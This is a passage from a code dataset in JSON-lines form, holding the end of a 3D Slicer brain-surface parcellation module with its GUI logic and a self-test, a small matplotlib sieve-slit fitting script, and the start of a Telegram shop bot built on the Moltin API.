self.logic.INFLATED_NODE_ATTRIBUTE_VALUE or\n nodeName == \"ViewP\" and nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE or\n nodeName == \"ViewO\" and nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE):\n return\n\n interactionNode.SetCurrentInteractionMode(interactionNode.Select)\n interactionNode.SetPlaceModePersistence(True)\n if nodeName == \"ViewI\":\n selectionNode.SetActivePlaceNodeID(inflatedNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(inflatedNode.GetClassName())\n elif nodeName == \"ViewP\":\n selectionNode.SetActivePlaceNodeID(pialNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(pialNode.GetClassName())\n else:\n selectionNode.SetActivePlaceNodeID(origNode.GetID())\n selectionNode.SetActivePlaceNodeClassName(origNode.GetClassName())\n interactionNode.SetCurrentInteractionMode(interactionNode.Place)\n\n def cleanup(self):\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.logic.removeObservers()\n self.removeObservers()\n slicer.app.layoutManager().disconnect(\"layoutChanged(int)\", self.onLayoutChanged)\n\n def setParameterNode(self, inputParameterNode):\n \"\"\"\n Adds observers to the selected parameter node. Observation is needed because when the\n parameter node is changed then the GUI must be updated immediately.\n \"\"\"\n # Set parameter node in the parameter node selector widget\n wasBlocked = self.ui.parameterNodeSelector.blockSignals(True)\n self.ui.parameterNodeSelector.setCurrentNode(inputParameterNode)\n self.ui.parameterNodeSelector.blockSignals(wasBlocked)\n\n if inputParameterNode == self.parameterNode:\n # No change\n return\n\n self.parameterNode = inputParameterNode\n\n try:\n slicer.app.pauseRender()\n\n # Remove observers on previously selected parameter node and add an observer to the newly selected.\n # Changes of parameter node are observed so that whenever parameters are changed by a script or any other module\n # those are reflected immediately in the GUI.\n self.removeObservers(self.onParameterNodeModified)\n if self.parameterNode is not None:\n self.addObserver(self.parameterNode, vtk.vtkCommand.ModifiedEvent, self.onParameterNodeModified)\n self.onParameterNodeModified(self.parameterNode)\n\n self.inputCurvesWidget.setParameterNode(inputParameterNode)\n self.inputPlanesWidget.setParameterNode(inputParameterNode)\n\n # Initial GUI update\n self.logic.setParameterNode(self.parameterNode)\n self.updateGUIFromParameterNode()\n\n finally:\n slicer.app.resumeRender()\n\n def onEndImportEvent(self, caller=None, event=None):\n self.onParameterNodeModified()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def onParameterNodeModified(self, caller=None, event=None, callData=None):\n if slicer.mrmlScene.IsImporting():\n return\n\n self.removeObservers(self.onOrigModelNodeModified)\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n if origModelNode:\n self.addObserver(origModelNode, vtk.vtkCommand.ModifiedEvent, self.onOrigModelNodeModified)\n self.updateGUIFromParameterNode()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def onOrigModelNodeModified(self, caller=None, event=None, callData=None):\n if slicer.mrmlScene.IsImporting():\n return\n self.updateImportWidget()\n\n def updateGUIFromParameterNode(self, caller=None, event=None):\n \"\"\"\n This method is called whenever parameter node is changed.\n The module GUI is updated to show the current state of the parameter node.\n \"\"\"\n # Disable all sections if no parameter node is selected\n self.ui.inputPlanesCollapsibleButton.enabled = 
self.parameterNode is not None\n self.ui.inputCurvesCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.inputModelCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.outputModelsCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.exportSegmentationCollapsibleButton.enabled = self.parameterNode is not None\n self.ui.applyButton.enabled = self.parameterNode is not None\n\n if self.outputModelsWidget is not None:\n self.outputModelsWidget.deleteLater()\n self.outputModelsWidget = None\n\n if self.parameterNode is None:\n return\n\n # Display parameters\n scalarOverlay = self.logic.getScalarOverlay(self.parameterNode)\n wasBlocked = self.ui.curvRadioButton.blockSignals(True)\n self.ui.curvRadioButton.checked = scalarOverlay == \"curv\"\n self.ui.curvRadioButton.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.sulcRadioButton.blockSignals(True)\n self.ui.sulcRadioButton.checked = scalarOverlay == \"sulc\"\n self.ui.sulcRadioButton.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelsRadioButton.blockSignals(True)\n self.ui.labelsRadioButton.checked = scalarOverlay == \"labels\"\n self.ui.labelsRadioButton.blockSignals(wasBlocked)\n \n wasBlocked = self.ui.origMarkupsCheckBox.blockSignals(True)\n self.ui.origMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.ORIG_NODE_ATTRIBUTE_VALUE))\n self.ui.origMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.pialMarkupsCheckBox.blockSignals(True)\n self.ui.pialMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE))\n self.ui.pialMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.inflatedMarkupsCheckBox.blockSignals(True)\n self.ui.inflatedMarkupsCheckBox.setChecked(self.logic.getMarkupSliceViewVisibility(self.parameterNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE))\n self.ui.inflatedMarkupsCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.planeIntersectionCheckBox.blockSignals(True)\n self.ui.planeIntersectionCheckBox.setChecked(self.logic.getPlaneIntersectionVisible())\n self.ui.planeIntersectionCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelOutlineCheckBox.blockSignals(True)\n self.ui.labelOutlineCheckBox.setChecked(self.logic.getLabelOutlineVisible())\n self.ui.labelOutlineCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewRedCheckBox.blockSignals(True)\n self.ui.lineViewRedCheckBox.setChecked(self.logic.getRedLineVisibility())\n self.ui.lineViewRedCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewGreenCheckBox.blockSignals(True)\n self.ui.lineViewGreenCheckBox.setChecked(self.logic.getGreenLineVisibility())\n self.ui.lineViewGreenCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.lineViewYellowCheckBox.blockSignals(True)\n self.ui.lineViewYellowCheckBox.setChecked(self.logic.getYellowLineVisibility())\n self.ui.lineViewYellowCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionViewRedCheckBox.blockSignals(True)\n self.ui.intersectionViewRedCheckBox.setChecked(self.logic.getRedIntersectionVisibility())\n self.ui.intersectionViewRedCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionViewGreenCheckBox.blockSignals(True)\n self.ui.intersectionViewGreenCheckBox.setChecked(self.logic.getGreenIntersectionVisibility())\n self.ui.intersectionViewGreenCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = 
self.ui.intersectionViewYellowCheckBox.blockSignals(True)\n self.ui.intersectionViewYellowCheckBox.setChecked(self.logic.getYellowIntersectionVisibility())\n self.ui.intersectionViewYellowCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.intersectionGlyphComboBox.blockSignals(True)\n index = self.ui.intersectionGlyphComboBox.findData(self.logic.getIntersectionGlyphType())\n self.ui.intersectionGlyphComboBox.currentIndex = index\n self.ui.intersectionGlyphComboBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.curveIntersectionScaleSlider.blockSignals(True)\n self.ui.curveIntersectionScaleSlider.value = self.logic.getIntersectionGlyphScale()\n self.ui.curveIntersectionScaleSlider.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.controlPointVisibilityCheckBox.blockSignals(True)\n self.ui.controlPointVisibilityCheckBox.setChecked(self.logic.getControlPointVisibility())\n self.ui.controlPointVisibilityCheckBox.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.labelVisibilityCheckBox.blockSignals(True)\n self.ui.labelVisibilityCheckBox.setChecked(self.logic.getLabelVisibility())\n self.ui.labelVisibilityCheckBox.blockSignals(wasBlocked)\n\n # Update each widget from parameter node\n # Need to temporarily block signals to prevent infinite recursion (MRML node update triggers\n # GUI update, which triggers MRML node update, which triggers GUI update, ...)\n\n wasBlocked = self.ui.origModelSelector.blockSignals(True)\n self.ui.origModelSelector.setCurrentNode(self.logic.getOrigModelNode(self.parameterNode))\n self.ui.origModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.pialModelSelector.blockSignals(True)\n self.ui.pialModelSelector.setCurrentNode(self.logic.getPialModelNode(self.parameterNode))\n self.ui.pialModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.inflatedModelSelector.blockSignals(True)\n self.ui.inflatedModelSelector.setCurrentNode(self.logic.getInflatedModelNode(self.parameterNode))\n self.ui.inflatedModelSelector.blockSignals(wasBlocked)\n\n wasBlocked = self.ui.exportSegmentationSelector.blockSignals(True)\n self.ui.exportSegmentationSelector.setCurrentNode(self.logic.getExportSegmentation())\n self.ui.exportSegmentationSelector.blockSignals(wasBlocked)\n\n # Update buttons states and tooltips\n if (self.logic.getNumberOfOutputModels() > 0 and self.logic.getExportSegmentation() and\n self.logic.getOrigModelNode(self.parameterNode) and self.logic.getPialModelNode(self.parameterNode)):\n self.ui.exportButton.enabled = True\n else:\n self.ui.exportButton.enabled = False\n\n outputModelsLayout = qt.QFormLayout()\n outputModelsLayout.verticalSpacing = 6\n\n self.outputModelsWidget = qt.QWidget()\n self.outputModelsWidget.setLayout(outputModelsLayout)\n self.ui.outputModelsCollapsibleButton.layout().addWidget(self.outputModelsWidget)\n\n for toolNode in self.logic.getToolNodes():\n outputModelNode = toolNode.GetNodeReference(\"BoundaryCut.OutputModel\")\n outputModelName = \"ERR\"\n if outputModelNode:\n outputModelName = outputModelNode.GetName()\n label = qt.QLabel(outputModelName + \":\")\n outputModelWidget = NeuroSegmentOutputToolWidget(self.logic)\n outputModelsLayout.addRow(label, outputModelWidget)\n outputModelWidget.setToolNode(toolNode)\n outputModelWidget.setParameterNode(self.parameterNode)\n\n self.updateOutputStructures()\n self.updateImportWidget()\n\n def createInputMarkupsWidget(self, markupNodeClass):\n markupsLayout = qt.QFormLayout()\n for inputNode in self.logic.getInputMarkupNodes():\n\n if inputNode.IsA(markupNodeClass):\n 
markupWidget = NeuroSegmentInputMarkupsWidget()\n markupWidget.setInputMarkupsNode(inputNode)\n markupsLayout.addRow(qt.QLabel(inputNode.GetName() + \":\"), markupWidget)\n\n markupsWidget = qt.QWidget()\n markupsWidget.setLayout(markupsLayout)\n return markupsWidget\n\n def updateParameterNodeFromGUI(self, caller=None, event=None):\n \"\"\"\n This method is called when the user makes any change in the GUI.\n The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).\n \"\"\"\n if self.parameterNode is None:\n return\n\n with slicer.util.NodeModify(self.parameterNode):\n self.logic.setOrigModelNode(self.parameterNode, self.ui.origModelSelector.currentNode())\n self.logic.setPialModelNode(self.parameterNode, self.ui.pialModelSelector.currentNode())\n self.logic.setInflatedModelNode(self.parameterNode, self.ui.inflatedModelSelector.currentNode())\n self.logic.setExportSegmentation(self.ui.exportSegmentationSelector.currentNode())\n\n def updateScalarOverlay(self):\n scalarName = \"curv\"\n if self.ui.curvRadioButton.isChecked():\n scalarName = \"curv\"\n elif self.ui.sulcRadioButton.isChecked():\n scalarName = \"sulc\"\n elif self.ui.labelsRadioButton.isChecked():\n scalarName = \"labels\"\n self.logic.setScalarOverlay(self.parameterNode, scalarName)\n\n def updateMarkupDisplay(self):\n \"\"\"\n Update the visibility of markups in each view based on the slice visibility checkboxes\n \"\"\"\n if self.parameterNode is None:\n return\n\n with slicer.util.NodeModify(self.parameterNode):\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.ORIG_NODE_ATTRIBUTE_VALUE, self.ui.origMarkupsCheckBox.checked)\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE, self.ui.pialMarkupsCheckBox.checked)\n self.logic.setMarkupSliceViewVisibility(self.parameterNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE, self.ui.inflatedMarkupsCheckBox.checked)\n\n self.logic.setIntersectionGlyphType(self.ui.intersectionGlyphComboBox.currentData)\n self.logic.setIntersectionGlyphScale(self.ui.curveIntersectionScaleSlider.value)\n\n self.logic.setRedLineVisibility(self.ui.lineViewRedCheckBox.checked)\n self.logic.setGreenLineVisibility(self.ui.lineViewGreenCheckBox.checked)\n self.logic.setYellowLineVisibility(self.ui.lineViewYellowCheckBox.checked)\n\n self.logic.setRedIntersectionVisibility(self.ui.intersectionViewRedCheckBox.checked)\n self.logic.setGreenIntersectionVisibility(self.ui.intersectionViewGreenCheckBox.checked)\n self.logic.setYellowIntersectionVisibility(self.ui.intersectionViewYellowCheckBox.checked)\n\n self.logic.setControlPointVisibility(self.ui.controlPointVisibilityCheckBox.checked)\n\n self.logic.setLabelVisibility(self.ui.labelVisibilityCheckBox.checked)\n\n def onApplyButton(self):\n \"\"\"\n Apply all of the parcellation tools\n \"\"\"\n if self.parameterNode is None:\n logging.error(\"onApplyButton: Invalid parameter node\")\n return\n\n self.logic.initializePedigreeIds(self.parameterNode)\n\n for toolNode in self.logic.getToolNodes():\n self.logic.runDynamicModelerTool(toolNode)\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n def onExportButton(self):\n \"\"\"\n Export the mesh connecting the inner and outer surfaces when the export button is clicked\n \"\"\"\n surfacesToExport = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n surfacesToExport.append(self.ui.structureSelector.itemText(index.row()))\n\n try:\n 
self.logic.exportOutputToSegmentation(self.parameterNode, surfacesToExport)\n except Exception as e:\n slicer.util.errorDisplay(\"Failed to compute results: \"+str(e))\n import traceback\n traceback.print_exc()\n\n def onExportLabelButton(self):\n surfacesToExport = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n surfacesToExport.append(self.ui.structureSelector.itemText(index.row()))\n\n self.logic.exportOutputToSurfaceLabel(self.parameterNode, surfacesToExport)\n\n def onParameterNodeAdded(self, parameterNode):\n \"\"\"\n Called if a node is added from the combobox.\n Sets the default node parameters.\n \"\"\"\n self.logic.setDefaultParameters(parameterNode)\n\n def onLoadQuery(self):\n \"\"\"\n Load the query information from file.\n If an error occurs, change the query button icon and display an error message.\n \"\"\"\n if self.parameterNode is None:\n return\n\n self.ui.loadQueryButton.setIcon(qt.QIcon())\n self.ui.loadQueryButton.setToolTip(\"\")\n\n currentPath = self.ui.queryFilePathEdit.currentPath\n\n success, message = self.logic.loadQuery(currentPath)\n if not success:\n icon = self.ui.loadQueryButton.style().standardIcon(qt.QStyle.SP_MessageBoxCritical)\n self.ui.loadQueryButton.setIcon(icon)\n self.ui.loadQueryButton.setToolTip(message)\n\n def updateOutputStructures(self):\n \"\"\"\n Update the contents of the structure selector.\n Ensure that the same structures are selected before and after update if possible.\n \"\"\"\n checkedItems = []\n checkedIndexes = self.ui.structureSelector.checkedIndexes()\n for index in checkedIndexes:\n checkedItems.append(self.ui.structureSelector.itemText(index.row()))\n\n self.ui.structureSelector.clear()\n for outputModel in self.logic.getOutputModelNodes():\n self.ui.structureSelector.addItem(outputModel.GetName())\n if outputModel.GetName() in checkedItems:\n row = self.ui.structureSelector.findText(outputModel.GetName())\n index = self.ui.structureSelector.model().index(row, 0)\n self.ui.structureSelector.setCheckState(index, qt.Qt.Checked)\n\n def updateImportWidget(self):\n \"\"\"\n Update the appearance of the import/export widget.\n This enables/disables the import button depending on the validity of the input, and shows/hides/populates the\n comboboxes for the input/output nodes and overlays.\n \"\"\"\n\n self.ui.importMarkupComboBox.setVisible(self.ui.markupRadioButton.isChecked())\n self.ui.destinationMarkupComboBox.setVisible(self.ui.markupRadioButton.isChecked())\n self.ui.importOverlayComboBox.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.destinationModelComboBox.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.destinationModelComboBox.setEnabled(self.ui.singleOverlayRadioButton.isChecked())\n\n self.ui.singleOverlayRadioButton.setVisible(self.ui.overlayRadioButton.isChecked())\n self.ui.multipleOverlayRadioButton.setVisible(self.ui.overlayRadioButton.isChecked())\n\n wasBlocking = self.ui.importOverlayComboBox.blockSignals(True)\n currentOverlayText = self.ui.importOverlayComboBox.currentText\n self.ui.importOverlayComboBox.clear()\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n if origModelNode:\n overlays = self.logic.getPointScalarOverlays(origModelNode)\n for overlay in overlays:\n overlayName = overlay.GetName()\n self.ui.importOverlayComboBox.addItem(overlayName)\n currentOverlayIndex = self.ui.importOverlayComboBox.findText(currentOverlayText)\n self.ui.importOverlayComboBox.currentIndex = currentOverlayIndex\n 
self.ui.importOverlayComboBox.blockSignals(wasBlocking)\n\n importEnabled = False\n if self.ui.markupRadioButton.isChecked():\n importNode = self.ui.importMarkupComboBox.currentNode()\n destinationNode = self.ui.destinationMarkupComboBox.currentNode()\n importEnabled = not importNode is None and not destinationNode is None and importNode != destinationNode\n\n elif self.ui.overlayRadioButton.isChecked():\n importOverlay = self.ui.importOverlayComboBox.currentText\n destinationNode = self.ui.destinationModelComboBox.currentNode()\n importEnabled = importOverlay != \"\"\n if destinationNode is None and self.ui.singleOverlayRadioButton.isChecked():\n importEnabled = False\n\n self.ui.importButton.enabled = importEnabled\n\n def onImportButton(self):\n if self.ui.markupRadioButton.isChecked():\n self.importMarkupNode()\n elif self.ui.overlayRadioButton.isChecked():\n if self.ui.singleOverlayRadioButton.isChecked():\n self.importOverlay()\n else:\n self.importMultipleStructures()\n self.updateGUIFromParameterNode()\n\n def importMultipleStructures(self):\n\n origModelNode = self.logic.getOrigModelNode(self.parameterNode)\n importOverlay = self.ui.importOverlayComboBox.currentText\n\n originalScalarName = None\n displayNode = origModelNode.GetDisplayNode()\n if displayNode:\n originalScalarName = displayNode.GetActiveScalarName()\n\n # In order to populate the overlay correctly, we need to change the color table to match the label\n self.logic.setScalarOverlay(self.parameterNode, importOverlay)\n\n colorTableNode = origModelNode.GetDisplayNode().GetColorNode()\n\n layout = qt.QFormLayout()\n comboBoxes = []\n\n outputModelNodes = self.logic.getOutputModelNodes()\n outputModelNames = []\n outputModelIds = []\n for outputModelNode in outputModelNodes:\n outputModelNames.append(outputModelNode.GetName())\n outputModelIds.append(outputModelNode.GetID())\n\n for i in range(colorTableNode.GetNumberOfColors()):\n colorName = colorTableNode.GetColorName(i)\n color = [0,0,0,0]\n colorTableNode.GetColor(i, color)\n\n destinationComboBox = qt.QComboBox()\n destinationComboBox.setSizePolicy(qt.QSizePolicy.Expanding, qt.QSizePolicy.Fixed)\n destinationComboBox.addItem(str(None), None)\n for i in range(len(outputModelNodes)):\n destinationComboBox.addItem(outputModelNames[i], outputModelIds[i])\n\n for i in range(len(color)):\n color[i] = int(255 * color[i])\n\n label = qt.QLabel()\n colorString = \"rgb({0}, {1}, {2})\".format(color[0], color[1], color[2])\n label.setStyleSheet(\"QLabel { background-color: \" + colorString + \"}\")\n label.setMinimumSize(24, 24)\n\n rowWidget = qt.QWidget()\n rowWidget.setLayout(qt.QHBoxLayout())\n rowWidget.layout().setContentsMargins(0,0,0,0)\n rowWidget.layout().addWidget(label)\n rowWidget.layout().addWidget(destinationComboBox)\n layout.addRow(qt.QLabel(colorName), rowWidget)\n comboBoxes.append(destinationComboBox)\n\n widget = qt.QWidget()\n widget.setLayout(layout)\n\n scrollArea = qt.QScrollArea()\n scrollArea.setWidget(widget)\n scrollArea.setWidgetResizable(True)\n scrollArea.setHorizontalScrollBarPolicy(qt.Qt.ScrollBarAlwaysOff)\n\n importMultipleDialog = qt.QDialog()\n importMultipleDialog.setWindowTitle(\"Import multiple overlay\")\n importMultipleDialog.setLayout(qt.QVBoxLayout())\n importMultipleDialog.layout().addWidget(scrollArea)\n importButton = qt.QPushButton(\"Import\")\n qt.QObject.connect(importButton, \"clicked()\", importMultipleDialog, \"accept()\")\n importMultipleDialog.layout().addWidget(importButton)\n result = importMultipleDialog.exec()\n if 
result != qt.QDialog.Accepted:\n if originalScalarName:\n self.logic.setScalarOverlay(self.parameterNode, originalScalarName)\n return\n\n for i in range(colorTableNode.GetNumberOfColors()):\n comboBox = comboBoxes[i]\n\n destinationId = comboBox.currentData\n if destinationId is None:\n continue\n\n destinationNode = slicer.mrmlScene.GetNodeByID(destinationId)\n if destinationNode is None:\n continue\n\n self.logic.convertOverlayToModelNode(self.logic.getOrigModelNode(self.parameterNode), importOverlay, destinationNode, i)\n\n color = [0.0, 0.0, 0.0, 1.0]\n colorTableNode.GetColor(i, color)\n destinationNode.GetDisplayNode().SetColor(color[:3])\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n # Restore the original scalar name\n if originalScalarName:\n self.logic.setScalarOverlay(self.parameterNode, originalScalarName)\n\n def importMarkupNode(self):\n importNode = self.ui.importMarkupComboBox.currentNode()\n destinationNode = self.ui.destinationMarkupComboBox.currentNode()\n destinationNode.CopyContent(importNode)\n\n def importOverlay(self):\n self.logic.initializePedigreeIds(self.parameterNode)\n importOverlay = self.ui.importOverlayComboBox.currentText\n destinationNode = self.ui.destinationModelComboBox.currentNode()\n self.logic.convertOverlayToModelNode(self.logic.getOrigModelNode(self.parameterNode), importOverlay, destinationNode)\n self.logic.exportOutputToSurfaceLabel(self.parameterNode)\n\n def onPlaneCheckBox(self, checked):\n if self.parameterNode is None:\n return\n self.logic.setPlaneIntersectionVisible(checked)\n\n def onLabelOutlineCheckBox(self, checked):\n if self.parameterNode is None:\n return\n self.logic.setLabelOutlineVisible(checked)\n\nclass NeuroSegmentParcellationTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear()\n pass\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n\n self.meshParseTool1()\n\n def setupSphere(self, radius):\n\n sphereSource = vtk.vtkSphereSource()\n sphereSource.SetRadius(radius)\n sphereSource.SetPhiResolution(75)\n sphereSource.SetThetaResolution(75)\n sphereSource.Update()\n\n modelNode = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLModelNode\")\n modelNode.SetAndObservePolyData(sphereSource.GetOutput())\n modelNode.CreateDefaultDisplayNodes()\n return modelNode\n\n def meshParseTool1(self):\n import time\n startTime = time.time()\n\n logic = NeuroSegmentParcellationLogic()\n parameterNode = logic.getParameterNode()\n\n origModelNode = self.setupSphere(50.0)\n pialModelNode = self.setupSphere(75.0)\n pialModelNode.GetDisplayNode().SetVisibility(False)\n\n logic.setOrigModelNode(parameterNode, origModelNode)\n logic.setPialModelNode(parameterNode, pialModelNode)\n\n parcellationQueryNode = slicer.vtkMRMLTextNode()\n parcellationQueryNode.SetName(\"ParcellationQuery\")\n parcellationQueryNode.SetText(\"\"\"_Planes = [ PA, PB, PC, PD ]; A = (PA & PB & PC); B = (PA & PB & PC); C = (PA & PB & PC); D = PD\"\"\")\n slicer.mrmlScene.AddNode(parcellationQueryNode)\n logic.setQueryNode(parcellationQueryNode)\n logic.parseParcellationString(parameterNode)\n\n planeA = slicer.util.getNode(\"PA\")\n planeA.SetOrigin([0, 0, 0])\n planeA.SetNormal([0, 0, 1])\n planeA.GetDisplayNode().SetVisibility(False)\n\n planeB = slicer.util.getNode(\"PB\")\n planeB.SetOrigin([0, 0, 0])\n 
planeB.SetNormal([1, 0, 0])\n planeB.GetDisplayNode().SetVisibility(False)\n\n planeC = slicer.util.getNode(\"PC\")\n planeC.SetOrigin([0, 0, 0])\n planeC.SetNormal([0, 1, 0])\n planeC.GetDisplayNode().SetVisibility(False)\n\n i = 0\n colors = [\n [1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0],\n [1.0, 1.0, 0.0],\n ]\n for outputModelNode in logic.getOutputModelNodes():\n outputModelNode.GetDisplayNode().SetColor(colors[i])\n i+=1\n\n seedPositions = [\n [[-24.256452560424805, -24.25225257873535, 36.426605224609375], [23.89341163635254, -22.64985466003418, 37.68958282470703]],\n [[24.005630493164062, 29.707569122314453, 32.274898529052734],[-19.602069854736328, 18.553592681884766, 42.119205474853516]],\n [[27.62245750427246, 29.372499465942383, -29.621036529541016],[-19.98876190185547, 31.806682586669922, -32.98733901977539]],\n [],\n ]\n\n logic.initializePedigreeIds(parameterNode)\n\n i = 0\n for toolNode in logic.getToolNodes():\n seed = logic.getInputSeedNode(toolNode)\n for point in seedPositions[i]:\n seed.AddFiducial(point[0], point[1], point[2])\n seed.GetDisplayNode().SetVisibility(False)\n logic.runDynamicModelerTool(toolNode)\n i+=1\n\n logic.exportOutputToSurfaceLabel(parameterNode)\n logic.setScalarOverlay(parameterNode, \"labels\")\n\n testDuration = time.time() - startTime\n logging.info(\"Test duration: %f\", testDuration)\n","sub_path":"NeuroSegmentParcellation/NeuroSegmentParcellation.py","file_name":"NeuroSegmentParcellation.py","file_ext":"py","file_size_in_byte":46335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"642928130","text":"#!./bin/grutinizer-python\nimport sys\nsys.path.append('./util/rcnp')\nfrom sieveslit_raytracer import *\nfrom pretty_matplotlib import *\nfrom setfont import *\n\nif __name__==\"__main__\":\n del sys.argv[0] # grutinizer/root issue\n setfont()\n\n\n tfile = ROOT.TFile(\"hist9026_raytrace.root\")\n hist = tfile.Get(\"Target/B[A]\")\n\n fig = plt.figure()\n axes = fig.add_subplot(1,1,1)\n setticks(axes,xmajor=10,xminor=2,ymajor=50,yminor=10)\n mat = axes.pcolormesh(*plot_root_2d_hist(hist))\n fig.colorbar(mat)\n\n # fitting sieveslit\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", type=str,help=\"Input sieve slit data\",default=None)\n args = parser.parse_args()\n\n if not args.input:\n parser.error(\"No input file specified.\")\n\n fitter = SieveSlitFit(args.input,x=2,a=2,y=1)\n fitter.global_fit()\n fitter.plot_global_fit()\n\n\n\n\n if False:\n #fit diagnostics\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X = np.arange(-600,600,20)\n A = np.arange(-0.1,0.1,0.0030)[0:len(X)]\n smallX=[]\n smallA=[]\n for i,x in enumerate(X):\n if x>=-450 and x<=350:\n smallX.append(x)\n for i,a in enumerate(A):\n if a>=-0.034 and a<0.064:\n smallA.append(a)\n # print len(smallX),len(smallA)\n X,A = np.meshgrid(smallX,smallA)\n Z = fitter.fit_a(X,A)\n #surf = ax.plot_surface(X,A,Z,rstride=1,cstride=1,cmap=cm.coolwarm,linewidth=0,antialiased=False)\n surf = ax.plot_wireframe(X,A,Z)\n\n xpts = []\n apts = []\n for row in fitter.data_holes:\n xpts.append(row[0])\n apts.append(row[1])\n ax.scatter(xpts,apts,fitter.fit_a(np.asarray(xpts),np.asarray(apts)),c='red')\n\n\n\n #plt.savefig(\"/user/sullivan/public_html/sieve_uncor.pdf\")\n plt.show()\n","sub_path":"util/rcnp/plot_sieve_fit.py","file_name":"plot_sieve_fit.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} 
+{"seq_id":"618149239","text":"import os\nimport logging\n\nfrom moltin_api import get_products, get_product, get_product_image_url\nfrom moltin_api import add_product_to_cart, get_user_cart_items, get_user_cart\nfrom moltin_api import delete_product_from_cart, create_customer\nfrom tools import get_product_info, get_user_cart_info, is_phone_number_valid\nfrom tools import is_email_valid\nfrom custom_logger import LogsHandler\n\nimport redis\nfrom dotenv import load_dotenv\nfrom telegram.ext import Updater, Filters\nfrom telegram.ext import CallbackQueryHandler, CommandHandler, MessageHandler\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\n\nlogger = logging.getLogger('Telegram logger')\ndatabase = None\n\n\ndef create_keyboard_for_menu():\n products = get_products()\n keyboard = [\n [InlineKeyboardButton(f'{product[\"name\"]}', callback_data=product[\"id\"])]\n for product in products\n ]\n keyboard.append([InlineKeyboardButton('Cart', callback_data='cart')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_product_description(product):\n product_quantity = product['meta']['stock']['level']\n product_id = product['id']\n keyboard = list()\n\n if not product_quantity:\n quantity_selection = None\n elif product_quantity <= 5:\n quantity_selection = [1, 3]\n else:\n quantity_selection = [1, 3, 5]\n\n if quantity_selection:\n selection_buttons = [\n InlineKeyboardButton(\n f'{quantity}kg', callback_data=f'{product_id},{quantity}'\n )\n for quantity in quantity_selection\n ]\n keyboard.append(selection_buttons)\n keyboard.append([InlineKeyboardButton('Cart', callback_data='cart')])\n keyboard.append([InlineKeyboardButton('Back', callback_data='back')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_cart(user_cart_items):\n keyboard = [\n [\n InlineKeyboardButton(\n f'Remove {item[\"name\"]} from the cart',\n callback_data=item['id']\n )\n ]\n for item in user_cart_items\n ]\n keyboard.append([InlineKeyboardButton('Buy', callback_data='buy')])\n keyboard.append([InlineKeyboardButton('Back to menu', callback_data='menu')])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef create_keyboard_for_confirm():\n keyboard = [\n [InlineKeyboardButton('Yes', callback_data='yes')],\n [InlineKeyboardButton('No', callback_data='no')],\n ]\n return InlineKeyboardMarkup(keyboard)\n\n\ndef delete_message(bot, update):\n bot.delete_message(\n chat_id=update.callback_query.message.chat_id,\n message_id=update.callback_query.message.message_id\n )\n\n\ndef start(bot, update):\n if update.message:\n chat_id = update.message.chat_id\n else:\n chat_id = 